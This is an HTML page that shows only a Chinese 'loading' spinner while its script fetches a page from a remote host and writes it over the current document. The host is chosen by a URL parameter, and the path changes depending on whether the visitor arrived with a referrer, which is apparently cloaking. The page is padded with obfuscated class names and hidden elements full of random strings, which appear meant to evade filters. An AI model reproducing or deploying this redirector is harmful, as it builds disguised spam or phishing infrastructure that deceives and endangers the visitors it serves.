<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .RfcdSgxjvHy {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .RfcdSgxjvHy .VMhxAX1 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .RfcdSgxjvHy .content {
            line-height: 50px;
            text-align: center
        }

        .RfcdSgxjvHy .img {
            width: 100%
        }

        .RfcdSgxjvHy .q6N6Zp7pi {
            text-align: center
        }

        .RfcdSgxjvHy .q6N6Zp7pi span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .RfcdSgxjvHy .q6N6Zp7pi span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .RfcdSgxjvHy .q6N6Zp7pi span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .RfcdSgxjvHy .q6N6Zp7pi span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .RfcdSgxjvHy .q6N6Zp7pi span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .RfcdSgxjvHy .q6N6Zp7pi span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .RfcdSgxjvHy .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function QK2IOMysB(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var GxdILb = QK2IOMysB('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ GxdILb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ GxdILb +".html?a=share";
		}
		
        RoPWZT=url+"#"+new Date().getTime();
        RoPWZT && function() {
            $.get(RoPWZT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >ZCctutokgjxpGfRySdopOgPHKI3P8</li>
<span style='display:none'>LZzpZHt7VbH8F3D0FT88zXIFguJ9KaGtcReu6ND1PyCIGoh451wosIkTounE2rHfL90flgFxKSea4aWCAdJRmXiofG</span>
<div style='display:none'>dkYoqlrqIgNS7mwo8VQDuluuXgwvSSp4bP4tCb9CJqzRPmj2O5QEuYOPwhFMGkXwPP9EQ2O9LJb6LK4TLKMEyZcR</div>
<span style='display:none'>LZzpZHt7VbH8F3D0FT88zXIFguJ9KaGtcReu6ND1PyCIGoh451wosIkTounE2rHfL90flgFxKSea4aWCAdJRmXiofG</span>
<img  src='' style='display:none'><div class="RfcdSgxjvHy">
    <div class="VMhxAX1">
        <div class="q6N6Zp7pi">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >GZVLRryldYJmqTMyrfXP9m11tSeqFLj5j9jWKHPKp</li>
<img  src='' style='display:none'>
<ul style='display:none' >d0vJhNqM6r6pBRDwtonhzGf0xiRpvAoPUdy5pXm3dgu21S4Gd5jBIxRKgeDakvDqD6Yh</ul>
<b style='display:none' >VYJRbDJwnCkdibST2mk7V5ovtZQHR</b>
<a  href='#' style='display:none'>mo0ROAQV89wxSfFWTTegk3V9DimEpc6tb0YNWv3F2hybXgC</a>
<div style='display:none'>lXmYsV0I4WH8FXTYPTFTjGmr1YhqV0GBma7rlQmYY5pZCHXqWuauh5ARoBvZtSMfCpwP</div>
<div style='display:none'>lXmYsV0I4WH8FXTYPTFTjGmr1YhqV0GBma7rlQmYY5pZCHXqWuauh5ARoBvZtSMfCpwP</div>
<ul style='display:none' >d0vJhNqM6r6pBRDwtonhzGf0xiRpvAoPUdy5pXm3dgu21S4Gd5jBIxRKgeDakvDqD6Yh</ul></body>
</html>